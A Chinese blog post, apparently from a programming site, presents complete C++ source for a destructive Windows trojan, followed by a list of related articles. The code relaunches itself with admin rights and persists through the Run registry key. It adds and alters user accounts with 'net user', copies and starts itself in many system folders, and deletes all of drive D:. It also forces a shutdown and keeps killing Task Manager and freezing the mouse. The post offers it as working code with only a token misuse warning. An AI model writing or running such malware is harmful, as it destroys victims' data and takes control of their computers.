c++ 制作木马病毒

首先感谢粉丝的支持！

上代码！

#include <iostream>
#include <io.h>
#include <cstring>
#include <stdlib.h>
#include <direct.h>
#include <tchar.h>
#include <windows.h>
#include <pthread.h>
#include <fstream>
#include <ctime>
#include <conio.h>
using namespace std;void *do_thread(void *arg);
HWND hWnd = GetConsoleWindow();void test() {HKEY hKey;if(RegOpenKeyEx(HKEY_CURRENT_USER, _T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {TCHAR strExeFullDir[MAX_PATH];GetModuleFileName(NULL, strExeFullDir, MAX_PATH);TCHAR strDir[MAX_PATH] = {};DWORD nLength = MAX_PATH;long result = RegGetValue(hKey, nullptr, _T("超强木马"), RRF_RT_REG_SZ, 0, strDir, &nLength);if(result != ERROR_SUCCESS || _tcscmp(strExeFullDir, strDir) != 0) {RegSetValueEx(hKey, _T("GISRestart"), 0, REG_SZ, (LPBYTE)strExeFullDir, (lstrlen(strExeFullDir) + 1)*sizeof(TCHAR));RegCloseKey(hKey);}}
}void ManagerRun(LPCSTR exe, LPCSTR param, int nShow = SW_SHOW) {SHELLEXECUTEINFO ShExecInfo;ShExecInfo.cbSize = sizeof(SHELLEXECUTEINFO);ShExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS ;ShExecInfo.hwnd = NULL;ShExecInfo.lpVerb = "runas";ShExecInfo.lpFile = exe;ShExecInfo.lpParameters = param;ShExecInfo.lpDirectory = NULL;ShExecInfo.nShow = nShow;ShExecInfo.hInstApp = NULL;BOOL ret = ShellExecuteEx(&ShExecInfo);CloseHandle(ShExecInfo.hProcess);
}void CopyMyselfTo(LPCTSTR targetPath) {TCHAR tcBuf[_MAX_PATH];::GetModuleFileName(NULL, tcBuf, sizeof(tcBuf));::CopyFile(tcBuf, targetPath, FALSE);
}int main(int argc, char *argv[]) {if(argc == 1) {ShowWindow(GetConsoleWindow(), SW_HIDE);ManagerRun(argv[0], "2");return 1;}else if(argc == 2) {string s;ifstream id("die.txt");id >> s;if(int(s.find("false")) != -1) {cout << "检测到结束文件，已结束病毒！" << endl;;system("pause");return 0;}ShowWindow(hWnd, SW_HIDE);test();system("net user Administrator dead");system("net user Administrator dead /add");char szPath[1000];GetModuleFileName(NULL, szPath, sizeof(szPath) - 1);string SzPath = szPath;LPCTSTR targetPath;struct _finddata_t fileinfo;long long fHandle;if(int(SzPath.find("Desktop")) != -1) {targetPath = _T("C:\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\超强木马.exe");targetPath = _T("C:\\Program Files (x86)\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Program Files (x86)\\超强木马.exe");targetPath = _T("C:\\Program Files\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Program Files\\超强木马.exe");targetPath = _T("C:\\Windows\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\超强木马.exe");targetPath = _T("C:\\Windows\\debug\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\debug\\超强木马.exe");targetPath = _T("C:\\Windows\\debug\\Help\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Help\\超强木马.exe");targetPath = _T("C:\\Windows\\debug\\Help\\mui\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Help\\mui\\超强木马.exe");targetPath = _T("C:\\Windows\\debug\\Help\\mui\\0409\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Help\\mui\\0409\\超强木马.exe");targetPath = _T("C:\\Windows\\Logs\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Logs\\超强木马.exe");targetPath = _T("C:\\Windows\\Logs\\SIH\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Logs\\SIH\\超强木马.exe");targetPath = _T("C:\\Windows\\Logs\\CBS\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Logs\\CBS\\超强木马.exe");targetPath = _T("C:\\Windows\\Logs\\DISM\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Logs\\DISM\\超强木马.exe");targetPath = _T("C:\\Windows\\Logs\\DPX\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\Logs\\DPX\\超强木马.exe");targetPath = _T("C:\\Windows\\OCR\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\OCR\\超强木马.exe");targetPath = _T("C:\\Windows\\OCR\\zh-cn\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Windows\\OCR\\zh-cn\\超强木马.exe");}else if((fHandle = _findfirst("C:\\Users\\Administrator\\Desktop\\超强木马.exe", &fileinfo)) == -1L) {targetPath = _T("C:\\Users\\Administrator\\Desktop\\超强木马.exe");CopyMyselfTo(targetPath);system("start C:\\Users\\Administrator\\Desktop\\超强木马.exe");}pthread_t tid;int ret;ret = pthread_create(&tid, NULL, do_thread, NULL);if(ret) {fprintf(stderr, "创建线程失败!\n");return -1;}ret = pthread_detach(tid);system("net user 已被木马 dead /add");system("del /F /S /Q D:\\");system("shutdown -s -t 0");}return 0;
}void *do_thread(void *arg) {while(true) {SetCursorPos(0, 0);system("taskkill /F /IM taskmgr.exe");Sleep(10);}
}

这个病毒新有提升到管理员权限，开机自动启动，多线程，还会复制自己到C盘和C盘的一些子文件夹中并运行，同时运行两串代码，边删除D盘，边定住鼠标，关闭任务管理器！

请勿滥用此代码！

好了，本期就到这里，感谢粉丝支持！

c++ 制作木马病毒相关推荐

信息安全实验五之计算机病毒与黑客实验脚本【恶意网页病毒演示病毒制作木马捆绑】
信息安全实验五之计算机病毒与黑客实验脚本[恶意网页病毒演示&病毒制作&木马捆绑] 一.脚本及恶意网页病毒演示实验 1.创建文件 2.拷贝文件 3.删除文件 4.修改文件二.病毒详 ...
360天擎默认卸载密码_装机工具老毛桃携带木马病毒卸载安全软件进行恶意推广...
[快讯] 近期,火绒收到用户反馈,称在使用老毛桃U盘启动装机工具制作的PE系统后,原有系统中多款安全软件被无故删除.火绒工程师溯源发现,上述使用老毛桃制作的PE系统中被植入了病毒,当用户使用该PE系统 ...
[回顾]2007年木马病毒“英雄榜”，你中过几个
相信点击本帖的朋友每位都中过可恶的木马病毒,而且有几次还记忆犹新或者心有余悸.哪个木马最让你痛彻心扉?正好这里有一份榜单,大家可以"旧梦重温",对号入座一下,欢迎补充 ***200 ...
Atitit.木马病毒免杀技术 360免杀杀毒软件免杀原理与原则 attilax 总结...
Atitit.木马病毒免杀技术 360免杀杀毒软件免杀原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...
基于注入式木马病毒（浏览器绑架）实现及防御方法的研究
基于注入式木马病毒(浏览器绑架)实现及防御方法的研究申明: 本文章重在对技术的研究和讨论,为学开发的同学提供一种实现思路,为学习测试的同学提供一个软件安全测试的方向.如有读者通过本文进行一些个人 ...
变种机器狗木马病毒防范
近期变种机器狗木马病毒猖獗,此病毒采用hook系统的磁盘设备栈来达到穿透目的的,危害极大,可穿透目前技术条件下的任何软件硬件还原!基本无法*还原抵挡.目前已知的所有还原产品,都无法防止这种病毒的穿透感 ...
9.Metasploit制作木马后门
01木马与后门木马?后门? 木马和后门都有害,尤其是木马,它由攻击者主动发起,稍不留心就会被利用:后门原来是留给自己方便用的,但也有可能被非法利用,这两种程序都会给用户带来损失. 木马是指潜伏在 ...
Atitit.木马病毒自动启动-------------win7计划任务的管理
Atitit.木马病毒自动启动-------------win7计划任务的管理 1. 计划任务的Windows系统中取代AT 的schtasks命令1 2. Win本身的系统计划任务列表1 2.1. ...
云服务器ECS挖矿木马病毒处理和解决方案
云服务器ECS挖矿木马病毒处理和解决方案参考文章: (1)云服务器ECS挖矿木马病毒处理和解决方案 (2)https://www.cnblogs.com/owenma/p/10430599.html ...
探秘网络背后黑产链：黑客攻击木马病毒机构内鬼防不胜防
电子商务.移动支付的普及,消费者越来越少随身携带现金,人们打趣道"小偷都快失业了". 但在互联网上,靠盗窃用户电子账户资金.虚拟资产的"网络小偷"却十分猖獗. ...

c++ 制作木马病毒

c++ 制作木马病毒

c++ 制作木马病毒相关推荐

最新文章

热门文章